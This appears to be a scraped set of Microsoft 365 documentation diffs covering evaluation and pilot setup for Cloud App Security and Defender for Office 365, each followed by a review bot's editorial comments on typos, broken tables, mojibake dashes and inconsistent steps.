+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-office-eval-steps.png)
+++
+|Step |Description |
+|||
+|[Review architecture requirements and key concepts](eval-defender-mcas-architecture.md) | Understand the Cloud App Security architecture and how it integrates with Microsoft 365 Defender, Microsoft Defender for Endpoint, and Azure Active Directory. |
+|[Enable the evaluation environment](eval-defender-mcas-enable-eval.md) | Connect to the portal, configure integration with Defender for Identity and/or your organization's network devices, and begin to view and manage cloud apps. |
+|[Set up the pilot ](eval-defender-mcas-pilot.md) | Scope your deployment to certain user groups, configure Conditional Access App Control, and try out tutorials for protecting your environment. |
+++
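Review bot: the steps illustration `![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-office-eval-steps.png)` is the Defender for Office 365 image and alt text, not a Cloud App Security one; the sibling pilot article uses `m365-defender-mcas-pilot-steps.png`, so this overview needs the matching MCAS steps image and alt text. In the table, the "Enable the evaluation environment" row says "configure integration with Defender for Identity and/or your organization's network devices", but the enable article it links to integrates with Microsoft Defender for Endpoint (its Step 2), so the row should say Defender for Endpoint. Formatting: the `|||` separator row has no dashes and will not render as a table, the stray `<br>` and the lines containing only `+` characters around the table should be removed, "Microsoft cloud app security" should be capitalized as the product name, and `[Set up the pilot ]` has a trailing space inside the link text.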
security Eval Defender Mcas Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-pilot.md
+
+ Title: Pilot Microsoft Cloud App Security with Microsoft 365 Defender, create pilot groups, configure conditional access control, try out capabilities, setup as part of Microsoft 365 Defender
+description: Set up your Microsoft 365 Defender trial lab or pilot environment to test and experience the security solution designed to protect devices, identity, data, and applications.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/09/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Cloud App Security with Microsoft 365 Defender
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Cloud App Security. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Cloud App Security.
++
+![Steps for piloting Microsoft Cloud App Security](../../media/defender/m365-defender-mcas-pilot-steps.png)
+
+- Step 1. [Create the pilot group ΓÇö Scope your pilot deployment to certain user groups](#step-1-create-the-pilot-group--scope-your-pilot-deployment-to-certain-user-groups)
+- [Step 2. Configure protection ΓÇö Conditional Access App Control](#step-2-configure-protection--conditional-access-app-control)
+- [Step 3. Try out capabilities ΓÇö Walk through tutorials for protecting your environment](#step-3-try-out-capabilities--walk-through-tutorials-for-protecting-your-environment)
++
+## Step 1. Create the pilot group ΓÇö Scope your pilot deployment to certain user groups
+
+Microsoft Cloud App Security enables you to scope your deployment. Scoping allows you to select certain user groups to be monitored for apps or excluded from monitoring. You can include or exclude user groups. To scope your pilot deployment, see [Scoped Deployment](/cloud-app-security/scoped-deployment).
++
+## Step 2. Configure protection ΓÇö Conditional Access App Control
+
+One of the most powerful protections you can configure is Conditional Access App Control. This requires integration with Azure Active Directory (Azure AD). It allows you to apply Conditional Access policies, including related policies (like requiring healthy devices), to cloud apps you've sanctioned.
+
+The first step in using Microsoft Cloud App Security to manage SaaS apps is to discover these and then add them to your Azure AD tenant. If you need help with discovery, see [Discover and manage SaaS apps in your network](/cloud-app-security/tutorial-shadow-it). After you've discovered apps, [add these to your Azure AD tenant](/azure/active-directory/manage-apps/add-application-portal).
+
+You can begin to manage these by doing the following:
+
+- First, in Azure AD, create a new conditional access policy and configure it to "Use Conditional Access App Control." This redirects the request to Cloud App Security. You can create one policy and add all SaaS apps to this policy.
+- Next, in Cloud App Security, create session policies. Create one policy for each control you want to apply.
+
+For more information, including supported apps and clients, see [Protect apps with Microsoft Cloud App Security Conditional Access App Control](/cloud-app-security/proxy-intro-aad).
+
+For example policies, see [Recommended Microsoft Cloud App Security policies for SaaS apps](../office-365-security/mcas-saas-access-policies.md). These policies build on a set of [common identity and device access policies](../office-365-security/microsoft-365-policies-configurations.md) that are recommended as a starting point for all customers.
+
+## Step 3. Try out capabilities ΓÇö Walk through tutorials for protecting your environment
+
+The Microsoft Cloud App Security documentation includes a series of tutorials to help you discover risk and protect your environment.
+
+Try out Cloud App Security tutorials:
+
+- [Detect suspicious user activity](/cloud-app-security/tutorial-suspicious-activity)
+- [Investigate risky users](/cloud-app-security/tutorial-ueba)
+- [Investigate risky OAuth apps](/cloud-app-security/investigate-risky-oauth)
+- [Discover and protect sensitive information](/cloud-app-security/tutorial-dlp)
+- [Protect any app in your organization in real time](/cloud-app-security/tutorial-proxy)
+- [Block downloads of sensitive information](/cloud-app-security/use-case-proxy-block-session-aad)
+- [Protect your files with admin quarantine](/cloud-app-security/use-case-admin-quarantine)
+- [Require step-up authentication upon risky action](/cloud-app-security/tutorial-step-up-authentication)
+
+## Next steps
+
+[Investigate and respond using Microsoft 365 Defender in a pilot environment](eval-defender-investigate-respond.md)
+
+Return to the overview for [Evaluate Microsoft Cloud App Security](eval-defender-mcas-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
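Review bot: every em dash in this file has come through as the mojibake sequence `ΓÇö` (for example `## Step 1. Create the pilot group ΓÇö Scope your pilot deployment to certain user groups`), and the in-page anchors such as `#step-1-create-the-pilot-group--scope-your-pilot-deployment-to-certain-user-groups` assume the dash collapses to a double hyphen; repair the character and then verify that the generated heading anchors still match the links in the step list. The first bullet `- Step 1. [Create the pilot group ΓÇö Scope ...]` links only the text after "Step 1.", while bullets 2 and 3 put "Step N." inside the link text; make the three consistent. Minor: "Use the following steps to setup and configure" should be "set up", and the lines containing only `+` before the image and before the Step 1 and Step 2 headings are stray.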
security Eval Defender Office 365 Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-architecture.md
+
+ Title: Review architecture requirements and planning concepts for Microsoft Defender for Office 365, construction, building, and design frameworks
+description: The technical diagram for Microsoft Defender for Office 365 in Microsoft 365 Defender will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/01/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Review Microsoft Defender for Office 365 architecture requirements and key concepts
++
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 1 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Before enabling Defender for Office 365, be sure you understand the architecture and can meet the requirements. This article describes the architecture, key concepts, and the prerequisites that your Exchange Online environment must meet.
+
+## Understand the architecture
+
+The following diagram illustrates baseline architecture for Microsoft Defender for Office which can include a third-party SMTP gateway or on-premises integration. Hybrid coexistence scenarios (i.e. production mailboxes are both on-premise and online) require more complex configurations and are not covered in this article or evaluation guidance.
+
+![Architecture for Microsoft Defender for Office 365](../../media/defender/m365-defender-office-architecture.png)
+
+The following table describes this illustration.
+
+|Call-out |Description |
+|||
+|1 | The host server for the external sender typically performs a public DNS lookup for an MX record which provides the target server to relay the message. This referral can either be Exchange Online (EXO) directly or an SMTP gateway that has been configured to relay against EXO. |
+|2 | Exchange Online Protection negotiates and validates the inbound connection and inspects the message headers and content to determine what additional policies, tagging, or processing is required. |
+|3 | Exchange Online integrates with Microsoft Defender for Office 365 to offer more advanced threat protection, mitigation, and remediation. |
+|4 | A message that is not malicious, blocked, or quarantined is processed and delivered to the recipient in EXO where user preferences related to junk mail, mailbox rules, or other settings are evaluated and triggered. |
+|5 | Integration with on-premises Active Directory can be enabled using Azure AD Connect to synchronize and provision mail-enabled objects and accounts to Azure Active Directory and ultimately Exchange Online. |
+|6 | When integrating an on-premises environment, it is strongly encouraged to use an Exchange server for supported management and administration of mail related attributes, settings, and configurations |
+|7 | Microsoft Defender for Office 365 shares signals to Microsoft 365 Defender for extended detection and response (XDR).|
+
+On-premises integration is common but optional. If your environment is cloud-only this guidance will also work for you.
+
+## Understand key concepts
+
+The following table identified key concepts that are important to understand when evaluating, configuring, and deploying MDO.
++
+|Concept |Description |More information |
+||||
+|Exchange Online Protection | Exchange Online Protection (EOP) is the cloud-based filtering service that helps protect your organization against spam and malware emails. EOP is included in all Microsoft 365 licenses which include Exchange Online. | [Exchange Online Protection overview](../office-365-security/exchange-online-protection-overview.md) |
+|Anti-malware protection | Organizations with mailboxes in EXO are automatically protected against malware. | [Anti-malware protection in EOP](../office-365-security/anti-malware-protection.md) |
+|Anti-spam protection | Organizations with mailboxes in EXO are automatically protected against junk mail and spam policies. | [Anti-spam protection in EOP](../office-365-security/anti-spam-protection.md) |
+|Anti-phishing protection | MDO offers more advanced anti-phishing protection related to spear phishing, whaling, ransomware, and other malicious activities. | [Additional anti-phishing protection in Microsoft Defender for Office 365](../office-365-security/anti-phishing-protection.md) |
+|Anti-spoofing protection | EOP includes features to help protect your organization from spoofed (forged) senders. | [Anti-spoofing protection in EOP](../office-365-security/anti-spoofing-protection.md) |
+|Safe attachments | Safe Attachments provides an additional layer of protection by using a virtual environment to check and "detonate" attachments in email messages before they are delivered. | [Safe Attachments in Microsoft Defender for Office 365](../office-365-security/safe-attachments.md) |
+|Safe attachments for SharePoint, OneDrive, and Microsoft Teams | In addition, Safe Attachments for SharePoint, OneDrive, and Microsoft Teams offers an additional layer of protection for files that have been uploaded to cloud storage repositories. | [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](../office-365-security/mdo-for-spo-odb-and-teams.md) |
+|Safe Links | Safe Links is a feature that provides URL scanning and rewriting within inbound email messages and offers verification of those links before they are delivered or clicked. | [Safe Links in Microsoft Defender for Office 365](../office-365-security/safe-links.md) |
+| | | |
+
+For more detailed information about the capabilities included with Microsoft Defender for Office, see [Microsoft Defender for Office 365 service description](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description).
+
+## Review architecture requirements
+A successful MDO evaluation or production pilot assumes the following pre-requisites:
+- All your recipient mailboxes are currently in Exchange Online.
+- Your public MX record resolves directly to EOP or a third-party SMTP gateway that then relays inbound external email directly to EOP.
+- Your primary email domain is configured as *authoritative* in Exchange Online.
+- You successfully deployed and configured *Directory Based Edge Blocking* (DBEB) as appropriate. For more information, see [Use Directory Based Edge Blocking to reject messages sent to invalid recipients](/exchange/mail-flow-best-practices/use-directory-based-edge-blocking).
+
+> [!IMPORTANT]
+> If these requirements are not applicable or you are still in a hybrid coexistence scenario, then a Microsoft Defender for Office 365 evaluation can require more complex or advanced configurations which are not fully covered in this guidance.
+
+## SIEM integration
+
+You can integrate Microsoft Defender for Office 365 with Azure Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response. For more information, see [Connect alerts from Microsoft Defender for Office 365](/azure/sentinel/connect-office-365-advanced-threat-protection).
+
+Microsoft Defender for Office 365 can also be integrated into other Security Information and Event Management (SIEM) solutions using the [Office 365 Activity Management API](/office/office-365-management-api/office-365-management-activity-api-reference).
+
+## Next steps
+
+Step 2 of 3: [Enable the evaluation environment Microsoft Defender for Office 365](eval-defender-office-365-enable-eval.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
+
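Review bot: The anti-spam row of the key-concepts table says organizations "are automatically protected against junk mail and spam policies", which reads as if the policies are the threat; suggest "protected against junk mail and spam by default anti-spam policies". Also in this file: "The following table identified key concepts" should be "identifies", and "MDO" is used in that sentence before the abbreviation has been introduced (the heading spells out Microsoft Defender for Office 365); "Microsoft Defender for Office" in the architecture paragraph and in the service-description sentence drops "365"; "on-premise" should be "on-premises"; row 6 of the call-out table has no terminating period; and the key-concepts table ends with an empty `| | | |` row that renders as a blank line.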
security Eval Defender Office 365 Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-enable-eval.md
+
+ Title: Enable the evaluation environment for Microsoft Defender for Office 365 in your production environment, activate your evaluation, activation
+description: Steps to activate Microsoft Defender for Office365 evaluation, with trial licenses, MX record handling, & auditing of accepted domains and inbound connections.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 07/01/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable the evaluation environment
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 2 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Use the following steps to enable the evaluation for Microsoft Defender for Office 365.
++
+![Steps to enable Microsoft Defender for Office 365 in the Microsoft Defender evaluation environment](../../media/defender/m365-defender-office-eval-enable-steps.png)
+
+- [Step 1: Activate trial licenses](#step-1-activate-trial-licenses)
+- [Step 2: Audit and verify the public MX record](#step-2-audit-and-verify-the-public-mx-record)
+- [Step 3: Audit accepted domains](#step-3-audit-accepted-domains)
+- [Step 4: Audit inbound connectors](#step-4-audit-inbound-connectors)
+- [Step 5: Activate the evaluation](#step-5-activate-the-evaluation)
+
+## Step 1: Activate trial licenses
+
+Log on to your existing Microsoft Defender for Office 365 environment or tenant administration portal.
+
+1. Navigate to the administration portal.
+2. Select Purchase Services from the quick launch.
++
+3. Scroll down to the Add-On section (or search for "Defender") to locate the Microsoft Defender for Office 365 plans.
+4. Click Details next the plan you want to evaluate.
++
+5. Click the *Start free trial* link.
++
+6. Confirm your request and click the *Try now* button.
++
+## Step 2: Audit and verify the public MX record
+
+To effectively evaluate Microsoft Defender for Office 365, it's important that inbound external email be relayed through the Exchange Online Protection (EOP) instance associated with your tenant.
+
+1. Log on to the M365 Admin Portal, expand Settings, and select Domains.
+2. Select your verified email domain and click Manage DNS.
+3. Make note of the MX record generated and assigned to your EOP tenant.
+4. Access your external (public) DNS zone and check the primary MX record associated with your email domain.
+ - *If your public MX record currently matches the assigned EOP address (e.g. tenant-com.mail.protection.outlook.com) then no further routing changes should be required*.
+ - If your public MX record currently resolves to a third-party or on-premises SMTP gateway then additional routing configurations may be required.
+ - If your public MX record currently resolves to on-premises Exchange then you may still be in a hybrid model where some recipient mailbox have not yet been migrated to EXO.
+
+## Step 3: Audit accepted domains
+
+1. Log on the Exchange Online Admin Portal, select Mail Flow, and then click Accepted Domains.
+2. From the list of accepted domains that have been added and verified in your tenant, make note of the **domain type** for your primary email domain.
+ - If the domain type is set to ***Authoritative*** then it is assumed all recipient mailboxes for your organization currently reside in Exchange Online.
+ - If the domain type is set to ***Internal Relay*** then you may still be in a hybrid model where some recipient mailboxes still reside on-premises.
+
+## Step 4: Audit inbound connectors
+
+1. Log on the Exchange Online Admin Portal, select Mail Flow, and then click Connectors.
+2. From the list of configured connectors, make note of any entries which are from **Partner Organization** and may correlate to a third-party SMTP gateway.
+3. From the list of configured connectors, make note of any entries labeled **From your organization's email server** which may indicate that you are still in hybrid scenario.
+
+## Step 5: Activate the evaluation
+
+Use the instructions here to activate your Microsoft Defender for Office 365 evaluation from the Microsoft 365 Defender portal.
+
+1. Log on to your tenant with an account that has access to the Microsoft 365 Defender portal.
+2. Choose whether you want to make the **Microsoft 365 Defender portal** your default interface for Microsoft Defender for Office 365 administration (recommended).
++
+3. From the navigation menu, select **Policies & Rules** under *Email & Collaboration*.
++
+4. On the *Policy & Rules* dashboard, click **Threat Policies**.
++
+5. Scroll down to *Additional Policies* and select the **Evaluate Defender for Office 365** tile.
++
+6. Now choose whether external email routes to Exchange Online directly, or to a third-party gateway or service, and click Next.
++
+7. If you use a third-party gateway, select the vendor name from the drop-down along with the inbound connector associated with that solution. When you've listed your answers, click Next.
++
+8. Review your settings and click the **Create Evaluation** button.
+
+| | |
+|||
+| :::image type="content" source="../../medio-eval-activate-complete.png" alt-text="And now the set up is complete. The blue button on this page says 'Go to Evaluation'."::: |
+
+## Next steps
+
+Step 3 of 3: Set up the pilot for Microsoft Defender for Office 365
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
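Review bot: Step 2's third-party-gateway bullet ("additional routing configurations may be required") never says which, yet Step 5 item 7 later asks for "the inbound connector associated with that solution"; suggest pointing readers from Step 2 to the Partner Organization connector audit in Step 4, and stating plainly that inbound mail reaching EOP other than through that connector has not been filtered by the gateway, so the routing choice in Step 5 item 6 must match what the MX audit actually found. Smaller points: the Next steps line "Step 3 of 3: Set up the pilot for Microsoft Defender for Office 365" is the only step reference without a hyperlink (the overview article links eval-defender-office-365-pilot.md); the closing two-column table has one image cell and no heading text; "Click Details next the plan" should be "next to the plan"; "some recipient mailbox have" should be "mailboxes"; "Log on the Exchange Online Admin Portal" in Steps 3 and 4 should be "Log on to"; "still in hybrid scenario" needs "a"; and "Office365" in the description is missing a space.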
security Eval Defender Office 365 Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-overview.md
+
+ Title: Evaluate Microsoft Defender for Office 365 overview, how to evaluate, evaluation steps
+description: Use this overview to learn the steps to set up an MDO pilot, including requirements, enabling or activating the eval, and setting up the pilot.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Enable and pilot Microsoft Defender for Office 365
+
+**Applies to:**
+- Microsoft 365 Defender
+
+This article outlines the process to enable and pilot Microsoft Defender for Office 365. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft 365 Defender](eval-overview.md) and you have [created the Microsoft 365 Defender evaluation environment](eval-create-eval-environment.md).
+<br>
+
+Use the following steps to enable and pilot Microsoft Defender for Office 365.
+
+![Steps for adding Microsoft Defender for Office to the Defender evaluation environment](../../media/defender/m365-defender-office-eval-steps.png)
+
+The following table describes the steps in the illustration.
+
+| |Step |Description |
+||||
+|1|[Review architecture requirements and key concepts](eval-defender-office-365-architecture.md) | Understand the Defender for Office architecture and be sure your Exchange Online environment meets the architecture prerequisites. |
+|2|[Enable the evaluation environment](eval-defender-office-365-enable-eval.md) | Follow the steps to setup the evaluation environment. |
+|3|[Set up the pilot ](eval-defender-office-365-pilot.md) | Create pilot groups, configure protection, and become familiar with key features and dashboards. |
+||||
+
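Review bot: The frontmatter line that reads only "++", where the sibling articles carry "Last updated : <date>", has no date, so this article will show no update date; add one. Also "Follow the steps to setup the evaluation environment" should be "set up", the link text "[Set up the pilot ]" has a trailing space that ends up in the rendered link, the raw "<br>" after the first paragraph should be a blank line, and the table ends with an empty "||||" row.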
security Eval Defender Office 365 Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-pilot.md
+
+ Title: Pilot Microsoft Defender for Office 365, use the evaluation in your production environment, promote the evaluation to live in production, learn how to evaluate Defender
+description: Steps to pilot your Evaluation with groups of active and existing users in order to properly test the features of Microsoft Defender for Office 365.
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++ Last updated : 05/25/2021
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot Microsoft Defender for Office 365
+**Applies to:**
+- Microsoft 365 Defender
+
+This article is [Step 3 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
+
+Use the following steps to setup and configure the pilot for Microsoft Defender for Office 365.
+
+![Steps for creating the pilot for Microsoft Defender for Office 365](../../media/defender/m365-defender-office-pilot.png)
+
+- [Step 1: Create pilot groups](#step-1-create-pilot-groups)
+- [Step 2: Configure protection](#step-2-configure-protection)
+- [Step 3: Try out capabilities ΓÇö Get familiar with simulation, monitoring, and metrics](#step-3-try-out-capabilities--get-familiar-with-simulation-monitoring-and-metrics)
+
+When you evaluate Microsoft Defender for Office 365, you may choose to pilot specific users before enabling and enforcing policies for your entire organization. Creating distribution groups can help manage the deployment processes. For example, create groups such as *Defender for Office 365 Users - Standard Protection*, *Defender for Office 365 Users - Strict Protection*, *Defender for Office 365 Users - Custom Protection*, or *Defender for Office 365 Users - Exceptions*.
+
+It may not be evident why 'Standard' and 'Strict' are the terms used for this, but that will become clear when you explore more about Defender for Office 365 security presets. Naming groups 'custom' and 'exceptions' speak for themselves, and though most of your users should fall under *standard* and *strict*, custom and exception groups will collect valuable data for you regarding managing risk.
+
+## Step 1: Create pilot groups
+
+Distribution groups can be created and defined directly in Exchange Online or synchronized from on-premises Active Directory.
+
+1. Logon to Exchange Admin Center (EAC) using an account that has been granted Recipient Administrator role or been delegated group management permissions.
+2. From the navigation menu, expand *Recipients* and select *Groups*.
++
+3. From the Groups dashboard, select "Add a group".
++
+4. For group type, select *Distribution* and click Next.
++
+5. Give the group a name and description and then click Next.
++
+## Step 2: Configure protection
+
+Some capabilities in Defender for Office 365 are configured and turned on by default, but security operations may want to raise the level of protection from the default.
+
+Some capabilities are *not yet* configured. You have three options for configuring protection:
+
+- **Assign preset security policies automatically** ΓÇö [Preset security policies](../office-365-security/preset-security-policies.md) are provided as a method to quickly assign a uniform level of protection across all of the capabilities. You can choose from ***standard*** or ***strict***. A good approach is to start with preset security policies and then fine-tune the policies as you learn more about the capabilities and your own unique threat environment. The advantage here is that you protect groups of users as quickly as possible, with the ability to tweak protection afterward. (This method is recommended.)
+- **Configure baseline protection manually** ΓÇö If you prefer to configure the environment yourself, you can quickly achieve a *baseline* of protection by following the guidance in [Protect against threats](../office-365-security/protect-against-threats.md). With this approach you get to learn more about the settings that are configurable. And, of course, you can fine-tune the policies later.
+- **Configure *custom* protection policies** ΓÇö You can also build and assign custom protection policies as part of your evaluation. Before you start customizing policies, it's important to understand the precedence in which these protection policies are applied and enforced. Security ops will need to create some policies even if when the preset is applied, in specific in order to define security policies for Safe Links and Safe Attachments.
+
+> [!IMPORTANT]
+> **If you need to configure custom protection policies**, you should examine the values that make up the **Standard** and **Strict** security definitions here: *[Recommended settings for EOP and Microsoft Defender for Office 365 security](../office-365-security/recommended-settings-for-eop-and-office365.md)*. Default values, as seen before any configuration takes place are also listed. Keep a spreadsheet of where your custom build deviates.
+
+### Assign preset security policies
+
+It's encouraged to begin with the *recommended baseline policies* when evaluating MDO and then refine them as needed over the course of your evaluation period.
+
+You can enable recommended EOP and Defender for Office 365 protection policies fast, and assign them to specific pilot users or defined groups as part of your evaluation. Preset policies offer a baseline **Standard** protection template or a more aggressive **Strict** protection template which can be assigned independently, or combined.
+
+Here is the [Preset security policies in EOP and Microsoft Defender for Office 365](../office-365-security/preset-security-policies.md) article outlining the steps.
+
+1. Log on to your Microsoft 365 tenant. Use an account with access to the Microsoft 365 Defender portal, added to Organization Management role in Office 365, or Security Administrator role in Microsoft 365.
+2. From the navigation menu, select *Polices & Rules* under Email & Collaboration.
++
+3. On the Policy & Rules dashboard, click *Threat Policies*.
++
+4. From the Microsoft 365 Defender portal, expand Threat Management from the navigation menu and then select Policy from the submenu.
+5. On the Policy dashboard, click *Preset security policies*.
++
+6. Click *Edit* to configure and assign the Standard policy and/or Strict policy. :::image type="content" source="../../medio-eval-pilot-preset.png" alt-text="On the Preset security policies panel, click Edit.":::
+7. Add conditions to apply baseline ***EOP*** protections to specific pilot users, or groups of users, as needed, and select *Next* to continue.
+ - Example, a Defender for Office 365 condition for pilot evaluations could be applied if the recipients are *members* of a defined *Defender for Office 365 Standard Protection* group, and then managed by simply adding accounts to, or removing account from, the group.
+ :::image type="content" source="../../medio-eval-pilot-eop-protections.png" alt-text="Add the conditions needed to apply the EOP security level to your pilot group.":::
+
+8. Add conditions to apply baseline ***MDO*** protections to specific pilot users, or groups of users, as needed. Click *Next* to continue.
+ - For example, a Defender for Office 365 condition for pilot evaluations could be applied if the recipients are *members* of a defined *Defender for Office 365 Standard Protection* group and then managed by simply adding / removing accounts via the group.
+ :::image type="content" source="../../medio-protections.png" alt-text="Add the conditions needed to apply the Defender for Office 365 security level to your pilot group.":::
+
+9. Review and confirm your changes for assigning preset security policies.
+10. Preset protection policies can be managed (re-configured, re-applied, disabled, etc.) by returning to the Microsoft 365 Defender portal > Policies & rules > Threat Policies > and clicking the *Preset security policies* tile.
+
+### Configure custom protection policies
+
+The pre-defined *Standard* or *Strict* Defender for Office 365 policy templates give your pilot users the recommended baseline protection. However, you can also build and assign custom protection policies as part of your evaluation.
+
+It's *important* to be aware of the precedence these protection policies take when applied and enforced, as [Order and precedence of email protection - Office 365](../office-365-security/how-policies-and-protections-are-combined.md) explains.
+
+The table below provides references and additional guidance for configuring and assigning custom protection policies:
+
+|Policy |Description |Reference |
+|::|||
+|Connection Filtering | Identify good or bad source email servers by their IP addresses. | [Configure the default connection filter policy in EOP](../office-365-security/configure-the-connection-filter-policy.md) |
+|Anti-Malware | Protect users from email malware including what actions to take and who to notify if malware is detected. | [Configure anti-malware policies in EOP](../office-365-security/configure-anti-malware-policies.md) |
+|Anti-Spoofing | Protect users from spoofing attempts using spoof intelligence and spoof intelligence insights. | [Configure spoof intelligence in Defender for Office 365](../office-365-security/learn-about-spoof-intelligence.md) |
+|Anti-Spam | Protect users from email spam including what actions to take if spam is detected. | [Configure anti-spam policies in Defender for Office 365](../office-365-security/configure-your-spam-filter-policies.md) |
+|Anti-Phishing | Protect users from phishing attacks and configure safety tips on suspicious messages | [Configure anti-phishing policies in Defender for Office 365](../office-365-security/configure-mdo-anti-phishing-policies.md) |
+|Safe Attachments | Protect users from malicious content in email attachments and files in SharePoint, OneDrive, and Teams. | [Set up safe attachment policies in Defender for Office 365](../office-365-security/set-up-safe-attachments-policies.md) |
+|Safe Links | Protect users from opening and sharing malicious links in email messages or Office desktop apps. | [Set up safe links policies in Defender for Office 365](../office-365-security/set-up-safe-links-policies.md) |
+
+## Step 3: Try out capabilities ΓÇö Get familiar with simulation, monitoring, and metrics
+
+Now that your pilot is set up and configured, it's helpful to become familiar with the reporting, monitoring, and attack simulation tools that are unique to Microsoft Defender for Microsoft 365.
+
+|Capability |Description |More information |
+||||
+|Threat Explorer | Threat Explorer is a powerful near real-time tool to help Security Operations teams investigate and respond to threats and displays information about suspected malware and phish in email and files in Office 365, as well as other security threats and risks to your organization. | [Views in Threat Explorer and real-time detections ](../office-365-security/threat-explorer-views.md) |
+|Attack Simulator | You can use Attack Simulation Training in the Microsoft Defender 365 portal to run realistic attack scenarios in your organization which help you identify and find vulnerable users before a real attack impacts your environment. | [Attack Simulator in Microsoft Defender for Office 365](../office-365-security/attack-simulator.md) |
+|Reports dashboard | On the left navigation menu, click Reports and expand the Email & collaboration heading. The Email & collaboration reports are about spotting security trends some of which will allow you to take action (through buttons like 'Go to submissions'), and others that will show trends, like Mailflow status summary, Top Malware, Spoof detections, Compromised users, Mail latency, Safe Links and Safe attachments reports. These metrics are generated automatically. | [View Reports](../office-365-security/view-email-security-reports.md) |
+
+## Next steps
++
+[Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
+
+Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
+
+Return to the overview for [Evaluate and pilot Microsoft 365 Defender](eval-overview.md)
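Review bot: In "Assign preset security policies", items 2 and 3 and items 4 and 5 describe two different navigation paths to the same tile: items 2 and 3 go Policies & Rules > Threat Policies in the Microsoft 365 Defender portal, then item 4 starts over with "expand Threat Management from the navigation menu and then select Policy from the submenu", which matches neither items 2 and 3 nor the path given in item 10 ("Policies & rules > Threat Policies > Preset security policies"); drop items 4 and 5 or merge the two into one path. Also: "Microsoft Defender for Microsoft 365" in Step 3 should be "Microsoft Defender for Office 365", and "Microsoft Defender 365 portal" in the Attack Simulator row should be "Microsoft 365 Defender portal"; the sentence "Security ops will need to create some policies even if when the preset is applied, in specific in order to define security policies for Safe Links and Safe Attachments" needs rewording (for example "even when a preset is applied, specifically to define Safe Links and Safe Attachments policies"); "Polices & Rules" is a typo; "Logon to Exchange Admin Center" should be "Log on to the Exchange admin center"; "Naming groups 'custom' and 'exceptions' speak for themselves" should be "speaks"; and the image paths beginning "../../medio-" look truncated.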
security Eval Defender Promote To Production https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-promote-to-production.md
+
+ Title: Promote your Microsoft 365 Defender evaluation environment to Production, Microsoft 365 Defender evaluation, try an evaluation, keep an evaluation, production evaluation
